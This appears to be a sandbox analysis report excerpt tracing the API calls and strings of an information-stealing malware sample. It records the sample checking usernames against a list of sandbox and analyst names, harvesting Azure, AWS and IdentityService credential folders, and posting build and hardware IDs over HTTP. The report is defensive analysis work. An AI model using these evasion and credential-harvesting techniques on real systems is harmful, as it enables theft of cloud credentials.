• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                        • String ID: passwords.txt
                                                                                                                                                                        • API String ID: 1139693110-347816968
                                                                                                                                                                        • Opcode ID: 32e2ea5c58a8d2cc257061a6b0ab31929b8b0825296acb9e88afe01fda8dbb4d
                                                                                                                                                                        • Instruction ID: 0a66f04e5775c63a194c2c49e1af25f2b3182997193e929f14349a07a2413686
                                                                                                                                                                        • Opcode Fuzzy Hash: 32e2ea5c58a8d2cc257061a6b0ab31929b8b0825296acb9e88afe01fda8dbb4d
                                                                                                                                                                        • Instruction Fuzzy Hash: DF813436941118AFCF03BBA4FD4A9DD7BB9EF28300F504062FA01A7161DB35AE158F91
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00181A13
                                                                                                                                                                        • lstrcmpiA.KERNEL32(001BABCC,?), ref: 00181A2E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUserlstrcmpi
                                                                                                                                                                        • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                        • API String ID: 542268695-1784693376
                                                                                                                                                                        • Opcode ID: 7f24db0b3c17c95c1926e50c30639d6fc63049a3f84483d0184f54f91842ae8b
                                                                                                                                                                        • Instruction ID: 3e853207099eb4ce7cffb18f86059e686da7fa5bc1873e583bd83eca87628f87
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f24db0b3c17c95c1926e50c30639d6fc63049a3f84483d0184f54f91842ae8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9021F0B190526C9BCB64DF15DE896D9BFB8AF49308F8001D8D548BB210CBB04BC9CF86
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00184BCD
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00184BEB
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184D83
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00184DC7
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00184DF5
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • lstrlenA.KERNEL32(?,001B6947,",build_id,001B77BC,------,001B77B0,",hwid,001B779C,------), ref: 001850EE
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185101
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0018510F
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0018516C
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00185177
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0018518E
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 0018519A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                        • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                        • API String ID: 3006978581-3960666492
                                                                                                                                                                        • Opcode ID: 75a20994e1251e8476d0ca13741fb50426897652bba1c76882d5dde338264602
                                                                                                                                                                        • Instruction ID: a13c6d2a183a5b0c73785d9ac3413ea6bff69fb9e34d8da195a6c727d394466f
                                                                                                                                                                        • Opcode Fuzzy Hash: 75a20994e1251e8476d0ca13741fb50426897652bba1c76882d5dde338264602
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E025B31D5512A9BDF22BB20DC46ADDB7B8FF28704F4680E1A54977162CB746E868FC0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • _memset.LIBCMT ref: 001927F1
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?), ref: 00192803
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A0), ref: 00192815
                                                                                                                                                                        • lstrcatA.KERNEL32(?,df523263f44cc8d55414a260a0197e4a), ref: 00192827
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A4), ref: 00192839
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00192849
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66A8), ref: 0019285B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00192864
                                                                                                                                                                        • lstrcatA.KERNEL32(?,EMPTY), ref: 00192880
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66B4), ref: 00192892
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 001928A2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B66B8), ref: 001928B4
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 001928C1
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 0019241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00194ACD), ref: 00192435
                                                                                                                                                                        • _memset.LIBCMT ref: 001928F7
                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,001B66BC,?), ref: 00192964
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00192972
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
• String ID: .exe$EMPTY$df523263f44cc8d55414a260a0197e4a
• API String ID: 141474312-3968930026
• Opcode ID: e5edde451932176a49fb4b01478f02cdd7c0ce00a5848d7b91c359689fa36de9
• Instruction ID: 1c256f900ed2d6b23e0f8fa4d4d7de9671cd909dd74d0323b6cb1a43333e22b8
• Opcode Fuzzy Hash: e5edde451932176a49fb4b01478f02cdd7c0ce00a5848d7b91c359689fa36de9
• Instruction Fuzzy Hash: D191C7B2D401299BDF12BB64DC86ADD77B8AB28304F4144E5F609B7162CB70AF868F54
APIs
• _memset.LIBCMT ref: 00196524
  • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
• lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00196543
• lstrcatA.KERNEL32(?,\.azure\), ref: 00196560
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019605A
  • Part of subcall function 00196013: FindFirstFileA.KERNEL32(?,?), ref: 00196071
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6ABC), ref: 00196092
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6AC0), ref: 001960AC
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 001960D3
  • Part of subcall function 00196013: StrCmpCA.SHLWAPI(?,001B6647), ref: 001960E7
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 00196104
  • Part of subcall function 00196013: PathMatchSpecA.SHLWAPI(?,?), ref: 00196131
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?), ref: 00196167
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6AD8), ref: 00196179
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 0019618C
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,001B6ADC), ref: 0019619E
  • Part of subcall function 00196013: lstrcatA.KERNEL32(?,?), ref: 001961B2
• _memset.LIBCMT ref: 00196598
• lstrcatA.KERNEL32(?,00000000), ref: 001965BA
• lstrcatA.KERNEL32(?,\.aws\), ref: 001965D7
  • Part of subcall function 00196013: wsprintfA.USER32 ref: 0019611B
  • Part of subcall function 00196013: CopyFileA.KERNEL32(?,?,00000001), ref: 0019626B
  • Part of subcall function 00196013: DeleteFileA.KERNEL32(?), ref: 001962DF
  • Part of subcall function 00196013: FindNextFileA.KERNEL32(?,?), ref: 00196341
  • Part of subcall function 00196013: FindClose.KERNEL32(?), ref: 00196355
• _memset.LIBCMT ref: 0019660C
• lstrcatA.KERNEL32(?,00000000), ref: 0019662E
• lstrcatA.KERNEL32(?,\.IdentityService\), ref: 0019664B
• _memset.LIBCMT ref: 00196680
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
• API String ID: 780282842-974132213
• Opcode ID: 02edde5f4f8f23288904aab492e4ac4f81b8faa2f990cfb3c255107b76662ae0
• Instruction ID: b80d5aa3bccbf93cd62b3a692be24150455f6d21041634c96aede6044c6c164b
• Opcode Fuzzy Hash: 02edde5f4f8f23288904aab492e4ac4f81b8faa2f990cfb3c255107b76662ae0
• Instruction Fuzzy Hash: A9418176E4021CAACB25FB64EC87FED777CAB29300F040496F615A7081DBB4AB858F51
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
  • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
  • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• CopyFileA.KERNEL32(?,?,00000001), ref: 0018AC5F
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0018AD69
• HeapAlloc.KERNEL32(00000000), ref: 0018AD70
• StrCmpCA.SHLWAPI(?,001B73D4,00000000), ref: 0018AE21
• StrCmpCA.SHLWAPI(?,001B73D8), ref: 0018AE49
• lstrcatA.KERNEL32(00000000,?), ref: 0018AE6D
• lstrcatA.KERNEL32(00000000,001B73DC), ref: 0018AE79
• lstrcatA.KERNEL32(00000000,?), ref: 0018AE83
• lstrcatA.KERNEL32(00000000,001B73E0), ref: 0018AE8F
• lstrcatA.KERNEL32(00000000,?), ref: 0018AE99
• lstrcatA.KERNEL32(00000000,001B73E4), ref: 0018AEA5
• lstrcatA.KERNEL32(00000000,?), ref: 0018AEAF
• lstrcatA.KERNEL32(00000000,001B73E8), ref: 0018AEBB
• lstrcatA.KERNEL32(00000000,?), ref: 0018AEC5
• lstrcatA.KERNEL32(00000000,001B73EC), ref: 0018AED1
• lstrcatA.KERNEL32(00000000,?), ref: 0018AEDB
• lstrcatA.KERNEL32(00000000,001B73F0), ref: 0018AEE7
• lstrcatA.KERNEL32(00000000,?), ref: 0018AEF1
• lstrcatA.KERNEL32(00000000,001B73F4), ref: 0018AEFD
• lstrlenA.KERNEL32(00000000), ref: 0018AF4F
• lstrlenA.KERNEL32(?), ref: 0018AF6A
• DeleteFileA.KERNEL32(?), ref: 0018AFAD
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
